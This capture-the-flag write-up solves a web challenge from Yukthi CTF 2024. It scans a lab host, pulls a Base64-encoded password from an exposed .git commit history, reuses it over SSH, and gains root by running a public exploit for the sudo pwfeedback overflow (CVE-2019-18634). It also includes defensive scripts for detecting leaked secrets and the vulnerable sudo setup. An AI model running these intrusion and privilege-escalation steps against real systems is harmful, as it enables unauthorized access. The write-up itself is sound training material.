Case Unlocked: Yukthi CTF 2024 Prelims

Introduction

Case Unlocked is a web-based challenge in the Yukthi CTF 2024 prelims, designed to immerse participants in a scenario of digital exploration and exploitation. The challenge tests participants' skills in identifying and leveraging web vulnerabilities, with a journey that starts from discovering sensitive information through exposed .git directories, leading up to gaining unauthorized access to a system and escalating privileges using a known vulnerability.

Skills Learned

  • Effective methods for exploring and exploiting web endpoints
  • Techniques for uncovering hidden or obscured login credentials
  • Strategies for privilege escalation on Linux systems

Enumeration

1. Initial Reconnaissance

The first step involved scanning the network for open ports. Using the command nmap -p- 10.11.3.92, we performed a comprehensive scan.

nmap -p- 10.11.3.92

This preliminary scan is essential as it helps to identify potential entry points on the target machine, revealing which ports are listening and potentially vulnerable to further exploitation.
Open Ports Image

2. Discovering Port 80

The scan results showed that port 80 was open, indicating a web service was running. Accessing this web service through a browser provided a pivotal clue for further actions.
Web Service Access Image
Upon accessing the webpage, I encountered an interactive game embedded within the site, an intriguing element worth exploring further.

3. Endpoint Exploration

Utilizing the Nikto tool, a comprehensive web server scanner that checks for dangerous files, outdated server software, and other problems, I discovered some interesting endpoints:

nikto -h http://localhost:34829

Endpoint Exploration Image

These included admin login and .git pages. Navigating to the admin page redirected to a login page, but without known credentials:
Login Endpoint Image

The discovery of a publicly accessible .git directory was crucial. It is a common security oversight to leave git directories accessible on production servers, which can expose sensitive information.
Git Tools Usage Image

Using GitTools (https://github.com/internetwache/GitTools), I cloned the repository found on the server, allowing access to the development history and potentially sensitive data.

4. Unearthing Credentials

git clone https://github.com/internetwache/GitTools
cd GitTools

After cloning the git repository, the command git log | grep "commit" | cut -d " " -f2 | xargs git show was used to dump the full content of every commit in the history. Walking the commit history this way is a quick way to spot leaked sensitive information such as credentials.

git log | grep "commit" | cut -d " " -f2 | xargs git show

The credentials were found encoded in Base64 within the commit messages: mail=tetris@gmail.com: passwd=VDdpM19pM181ZXJlY3RfN2E1NXcwcmQ=, which decodes to T7i3_i3_5erect_7a55w0rd.

username=tetris@gmail.com
password=T7i3_i3_5erect_7a55w0rd
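As an added defensive illustration (not part of the original write-up), this Python script automates the check done by hand above: it walks git log output, flags credential-looking key=value pairs in commit messages and decodes any Base64 values so a repository owner can catch such leaks before pushing. The log text is a constructed sample modelled on the finding above.

```python
import base64
import re

# Constructed sample of `git log` output (not the challenge's real history); the
# second commit message embeds a Base64-encoded password like the one found above.
SAMPLE_LOG = """\
commit 3f2a9c1d5e7b8a0c4d6e2f1b3a5c7d9e0f1a2b3c
Author: dev <dev@example.invalid>
Date:   Mon Apr 1 10:00:00 2024 +0000

    add tetris game

commit 9b8a7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2f1a0b
Author: dev <dev@example.invalid>
Date:   Mon Apr 1 11:00:00 2024 +0000

    mail=tetris@gmail.com: passwd=VDdpM19pM181ZXJlY3RfN2E1NXcwcmQ=
"""

# key=value pairs whose key looks like a credential (the value may be Base64).
CRED_RE = re.compile(
    r"(?i)\b(passw(?:or)?d|pass|pwd|secret|token|api[_-]?key)\s*=\s*([A-Za-z0-9+/=_\-@.]+)")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")

def try_b64(value):
    """Return the decoded text if value is valid Base64 decoding to printable ASCII, else None."""
    if len(value) % 4 or not B64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None

def scan_log(log_text):
    """Return (commit, key, raw value, decoded-or-None) for every credential-looking pair."""
    findings, commit = [], None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]      # remember which commit we are inside
            continue
        for m in CRED_RE.finditer(line):
            key, value = m.group(1), m.group(2)
            findings.append((commit, key, value, try_b64(value)))
    return findings

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

To audit a real repository, pipe `git log` into scan_log (for example scan_log(sys.stdin.read())) and treat every non-empty result as a secret to rotate and purge from history.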

5. Securing the Flag

With the decoded credentials in hand, I logged in through the login.html page. On successful authentication I was redirected to the /secret.php page, where the first flag was revealed.

Secret Page Flag Image

Challenge 2: Loophole Discovery

After completing the initial challenge, I resumed with another round of port scanning to uncover further points of attack. This scan highlighted an active SSH service on the target.

1. Further Reconnaissance

A subsequent port scan revealed that SSH (port 22) was open, providing an ideal vector for utilizing the credentials discovered earlier. This allowed for direct access to the system's shell.

ssh tetris@IPaddress

SSH Access Image

2. Identifying Vulnerable Sudo Version

Once inside the shell, I employed various strategies to escalate privileges. Noticing that the sudo version was 1.8.21, an older release with a known exploitable bug, I identified a potential avenue for attack. Password feedback (asterisks echoed while typing the password) confirmed that the pwfeedback option was enabled, which is the precondition for the buffer overflow in that option (CVE-2019-18634).

sudo --version

Sudo Version Check Image

Research on Google led me to an exploit in the Exploit Database that could leverage this vulnerability (CVE-2019-18634).
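An added configuration check, not from the original write-up, that a system owner can run against sudo --version output and the sudoers file to see whether the pwfeedback condition described above applies; both inputs here are constructed samples. Version boundaries follow the sudo advisory for CVE-2019-18634 (1.7.1 through 1.8.25p1 exploitable, 1.8.26 to 1.8.30 not exploitable, 1.8.31 fixed).

```python
import re

# Constructed samples (not from the challenge machine): `sudo --version`
# output and a sudoers file that turns pwfeedback on.
SAMPLE_VERSION_OUTPUT = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        mail_badpass,pwfeedback
root    ALL=(ALL:ALL) ALL
"""

# Boundaries from the sudo advisory for CVE-2019-18634: 1.7.1 through 1.8.25p1
# are exploitable with pwfeedback on; 1.8.26-1.8.30 have the bug but are not
# exploitable; 1.8.31 fixes it.
EXPLOITABLE_LOW, EXPLOITABLE_HIGH, FIXED = (1, 7, 1, 0), (1, 8, 25, 1), (1, 8, 31, 0)

def parse_version(output):
    """Turn 'Sudo version 1.8.21p2' into (1, 8, 21, 2); a missing patch level is 0."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?", output)
    if not m:
        raise ValueError("unrecognised sudo --version output")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch), int(plevel or 0))

def pwfeedback_enabled(sudoers_text):
    """Walk Defaults lines; the last pwfeedback / !pwfeedback option seen wins.
    Assumes the compiled-in default is off, as in stock sudo builds."""
    enabled = False
    for line in sudoers_text.splitlines():
        parts = line.split("#", 1)[0].split(None, 1)   # drop comments, split keyword/options
        if len(parts) < 2 or not parts[0].startswith("Defaults"):
            continue
        for opt in parts[1].split(","):
            if opt.strip() == "pwfeedback":
                enabled = True
            elif opt.strip() == "!pwfeedback":
                enabled = False
    return enabled

def assess(version_output, sudoers_text):
    """Verdict for CVE-2019-18634; the fix is sudo >= 1.8.31 or 'Defaults !pwfeedback'."""
    v = parse_version(version_output)
    if not pwfeedback_enabled(sudoers_text) or v >= FIXED or v < EXPLOITABLE_LOW:
        return "NOT AFFECTED"
    if v <= EXPLOITABLE_HIGH:
        return "VULNERABLE"
    return "BUG PRESENT, NOT EXPLOITABLE"
```

On a live host, feed it the real outputs (subprocess.run(["sudo", "--version"]) and the contents of /etc/sudoers plus /etc/sudoers.d/*); a VULNERABLE verdict is fixed by upgrading sudo or adding Defaults !pwfeedback.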

3. Gaining Root Access

I cloned the exploit script from GitHub:

git clone https://github.com/Plazmaz/CVE-2019-18634/
cd CVE-2019-18634
./self-contained.sh

Root Access Image

Running the ./self-contained.sh script from the cloned repository exploited the pwfeedback buffer overflow vulnerability, successfully granting root access. This allowed me to locate a critical document inside /root/locker/.
